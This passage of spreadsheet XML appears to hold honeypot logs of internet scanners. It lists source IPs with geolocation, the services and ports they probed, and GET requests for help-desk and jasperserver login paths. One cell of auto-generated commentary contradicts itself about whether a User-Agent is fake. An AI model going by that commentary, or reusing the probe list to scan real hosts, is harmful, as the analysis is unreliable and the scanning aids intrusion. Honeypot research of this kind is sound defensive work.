    <t>NA&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '154.93.37.45', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '156.244.8.69', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '193.57.138.110', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '91.194.11.82', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '94.131.8.76', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '156.244.37.11', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '149.102.153.168', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.54.63.23', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.54.79.122', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '185.250.150.39', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/helpdesk/WebObjects/Helpdesk.woa'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '154.26.156.60', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/helpdesk/WebObjects/Helpdesk.woa'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '149.102.153.168', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/helpdesk/WebObjects/Helpdesk.woa'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '77.91.74.218', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/helpdesk/WebObjects/Helpdesk.woa'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.54.115.66', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/helpdesk/WebObjects/Helpdesk.woa'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.60.209.6', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/helpdesk/WebObjects/Helpdesk.woa'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '5.180.55.39', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '5.253.40.123', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '103.113.68.70', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '5.180.55.39', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/helpdesk/WebObjects/Helpdesk.woa'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '149.102.153.168', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/helpdesk/WebObjects/Helpdesk.woa'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '91.194.11.82', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/helpdesk/WebObjects/Helpdesk.woa'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '103.211.202.140:8443', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/helpdesk/WebObjects/Helpdesk.woa'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '5.253.43.207', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '185.234.67.80', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '154.90.63.129', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.60.171.39', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '5.182.38.84', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '194.4.48.242', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '194.233.76.135', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '95.164.118.29', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '109.123.229.33', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.54.116.162', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '94.131.113.33', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '194.4.48.242', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/helpdesk/WebObjects/Helpdesk.woa'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '154.90.63.129', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/helpdesk/WebObjects/Helpdesk.woa'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '5.253.43.207', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/helpdesk/WebObjects/Helpdesk.woa'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '185.255.123.181', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '203.29.241.98', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.54.115.66', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.60.224.106', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '194.146.12.172', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '209.145.61.177', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '94.131.118.77', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.60.209.6', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.60.209.6', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/login.html'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.54.115.66', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/jasperserver-pro/login.html'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.60.224.106', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.60.224.106', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/login.html'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '95.164.118.29', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/login.html'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '95.164.118.29', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/jasperserver-pro/login.html'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '144.126.148.5', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/jasperserver/login.html'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '144.126.148.5', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/jasperserver-pro/login.html'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '109.123.229.33', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/jasperserver-pro/login.html'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.60.209.6', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/jasperserver-pro/login.html'}}&amp;&amp;{Data_RDP:NA}</t>
  </si>
  <si>
    <t>::ffff:b9b4:8c05</t>
  </si>
  <si>
    <t>3113b999d5480568d7c858d569b55864</t>
  </si>
  <si>
    <t>194.187.176.36</t>
  </si>
  <si>
    <t>SMA-LAB_RDP_H35&amp;&amp;SMA-LAB_IMAP_HC1</t>
  </si>
  <si>
    <t>3389&amp;&amp;143&amp;&amp;80&amp;&amp;23&amp;&amp;5900&amp;&amp;110&amp;&amp;389&amp;&amp;443</t>
  </si>
  <si>
    <t>connection&amp;&amp;GET&amp;&amp;command&amp;&amp;stshash</t>
  </si>
  <si>
    <t>{Data_RDP:NA}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Accept-Language': 'en;q=0.7,en-US;q=0.3', 'Cache-Control': 'no-cache', 'Connection': 'keep-alive', 'Host': '103.113.68.70', 'Pragma': 'no-cache', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'STLS'}}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=root'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Accept-Language': 'en;q=0.7,en-US;q=0.3', 'Cache-Control': 'no-cache', 'Connection': 'keep-alive', 'Host': '144.126.148.5', 'Pragma': 'no-cache', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:c2bb:b024</t>
  </si>
  <si>
    <t>This log entry suggests a GET request was made to the IP address 144.126.148.5 from an unknown browser (Mozilla/5.0) likely on a Windows machine, indicating potential unauthorized access or scanning activity. The User-Agent string is fake and often used by malicious bots to hide their true identity. &amp;&amp; A GET request was made to the root directory of a server with an unusual IP address, suggesting a potential scanning or reconnaissance attempt by an attacker. The user agent string is legitimate but may be spoofed. The connection appears to be persistent.</t>
  </si>
  <si>
    <t>Scanning GET &amp;&amp; Port Scan 
Web Scanner</t>
  </si>
  <si>
    <t>a3cb06d7ae842acf9eead202e50b9233</t>
  </si>
  <si>
    <t>59.21.51.13</t>
  </si>
  <si>
    <t>Busan</t>
  </si>
  <si>
    <t>Buk-gu</t>
  </si>
  <si>
    <t>Mandeok-dong</t>
  </si>
  <si>
    <t>8692398</t>
  </si>
  <si>
    <t>616-110</t>
  </si>
  <si>
    <t>35.2138</t>
  </si>
  <si>
    <t>129.039</t>
  </si>
  <si>
    <t>::ffff:3b15:330d</t>
  </si>
  <si>
    <t>246d831841d8b6f59753f7f4f1ed19b4</t>
  </si>
  <si>
    <t>103.146.132.6</t>
  </si>
  <si>
    <t>SMA-LAB_MYSQL_H45&amp;&amp;SMA-LAB_MYSQL_HC1</t>
  </si>
  <si>
    <t>Kabupaten Sampang</t>
  </si>
  <si>
    <t>Sampang</t>
  </si>
  <si>
    <t>1628899</t>
  </si>
  <si>
    <t>-7.20742</t>
  </si>
  <si>
    <t>113.255</t>
  </si>
  <si>
    <t>139940</t>
  </si>
  <si>
    <t>Dinas Komunikasi dan Informatika Kabupaten Sampang</t>
  </si>
  <si>
    <t>2019-12-13</t>
  </si>
  <si>
    <t>IDNIC-SAMPANGKAB-ID</t>
  </si>
  <si>
    <t>::ffff:6792:8406</t>
  </si>
  <si>
    <t>723c4c3575ab55b1dba5d0bbb15c6447</t>
  </si>
  <si>
    <t>112.170.104.101</t>
  </si>
  <si>
    <t>SMA-LAB_MT-CPA_H13&amp;&amp;SMA-LAB_TELNET_HC1</t>
  </si>
  <si>
    <t>8510&amp;&amp;23&amp;&amp;46743</t>
  </si>
  <si>
    <t>Seongnam-si (Sujeong-gu)</t>
  </si>
  <si>
    <t>37.4224</t>
  </si>
  <si>
    <t>127.102</t>
  </si>
  <si>
    <t>::ffff:70aa:6865</t>
  </si>
  <si>
    <t>653d3ca5452a0db10c7551cb854039b7</t>
  </si>
  <si>
    <t>59.127.44.65</t>
  </si>
  <si>
    <t>NA&amp;&amp;59-127-44-65.hinet-ip.hinet.net</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H4&amp;&amp;SMA-LAB_HTTP_H5&amp;&amp;SMA-LAB_HTTP_H14&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_MT-CPA_H27&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_MT-CPA_H32&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H18</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;80&amp;&amp;32844&amp;&amp;34407&amp;&amp;34398&amp;&amp;9100&amp;&amp;NA</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.171.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '149.102.153.168:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.250.150.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:3b7f:2c41</t>
  </si>
  <si>
    <t>5c4efff7136f05b2b4fd3881bbe8962f</t>
  </si>
  <si>
    <t>196.190.3.120</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_MT-CPA_H34</t>
  </si>
  <si>
    <t>23&amp;&amp;8694&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:c4be:378</t>
  </si>
  <si>
    <t>d11b29be416964a327cd2d09f2cec194</t>
  </si>
  <si>
    <t>183.105.224.153</t>
  </si>
  <si>
    <t>SMA-LAB_MT-CPA_H43&amp;&amp;SMA-LAB_TELNET_HC1</t>
  </si>
  <si>
    <t>47540&amp;&amp;23</t>
  </si>
  <si>
    <t>Wando-gun</t>
  </si>
  <si>
    <t>1833493</t>
  </si>
  <si>
    <t>537-880</t>
  </si>
  <si>
    <t>34.3111</t>
  </si>
  <si>
    <t>126.755</t>
  </si>
  <si>
    <t>2009-11-04</t>
  </si>
  <si>
    <t>::ffff:b769:e099</t>
  </si>
  <si>
    <t>3eed3cce245ea1f95541ebf68992214d</t>
  </si>
  <si>
    <t>171.237.213.225</t>
  </si>
  <si>
    <t>::ffff:abed:d5e1</t>
  </si>
  <si>
    <t>5d42ae29325d1a35912cdbbed7484bcb</t>
  </si>
  <si>
    <t>219.115.142.49</t>
  </si>
  <si>
    <t>zaqdb738e31.rev.zaq.ne.jp&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_HC1</t>
  </si>
  <si>
    <t>JCOM</t>
  </si>
  <si>
    <t>J:COM WEST Co., Ltd.</t>
  </si>
  <si>
    <t>::ffff:db73:8e31</t>
  </si>
  <si>
    <t>339cb14e8f412259ee8cb65f86955e93</t>
  </si>
  <si>
    <t>120.28.82.224</t>
  </si>
  <si>
    <t>Malanday</t>
  </si>
  <si>
    <t>1703116</t>
  </si>
  <si>
    <t>14.706900000000001</t>
  </si>
  <si>
    <t>121.131</t>
  </si>
  <si>
    <t>::ffff:781c:52e0</t>
  </si>
  <si>
    <t>93c00cd850c2f83b91cfc9c7a66d2b14</t>
  </si>
  <si>
    <t>51.254.49.96</t>
  </si>
  <si>
    <t>jarrod.probe.onyphe.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTPS_HC1&amp;&amp;SMA-LAB_DNS_H40&amp;&amp;SMA-LAB_SMB_H13&amp;&amp;SMA-LAB_SSH_H28&amp;&amp;SMA-LAB_VNC_H13&amp;&amp;SMA-LAB_SOCKS5_H37&amp;&amp;SMA-LAB_PJL_H44&amp;&amp;SMA-LAB_HTTPS_H28&amp;&amp;SMA-LAB_LDAP_H28&amp;&amp;SMA-LAB_HTTP_H12&amp;&amp;SMA-LAB_IPP_H5&amp;&amp;SMA-LAB_MT-CPA_H28&amp;&amp;SMA-LAB_HTTPS_H34&amp;&amp;SMA-LAB_HTTPS_H4&amp;&amp;SMA-LAB_HTTPS_H23&amp;&amp;SMA-LAB_HTTPS_H32&amp;&amp;SMA-LAB_HTTPS_H17&amp;&amp;SMA-LAB_MT-CPA_H10&amp;&amp;SMA-LAB_HTTPS_H33&amp;&amp;SMA-LAB_HTTPS_H44&amp;&amp;SMA-LAB_HTTPS_H36&amp;&amp;SMA-LAB_HTTPS_H7&amp;&amp;SMA-LAB_HTTPS_H9&amp;&amp;SMA-LAB_HTTPS_H24&amp;&amp;SMA-LAB_HTTPS_H41</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;8443&amp;&amp;53&amp;&amp;445&amp;&amp;22&amp;&amp;5900&amp;&amp;1080&amp;&amp;9100&amp;&amp;443&amp;&amp;389&amp;&amp;80&amp;&amp;631&amp;&amp;25983&amp;&amp;34839</t>
  </si>
  <si>
    <t>3117735</t>
  </si>
  <si>
    <t>28070</t>
  </si>
  <si>
    <t>40.4168</t>
  </si>
  <si>
    <t>-3.70379</t>
  </si>
  <si>
    <t>GET&amp;&amp;connection</t>
  </si>
  <si>
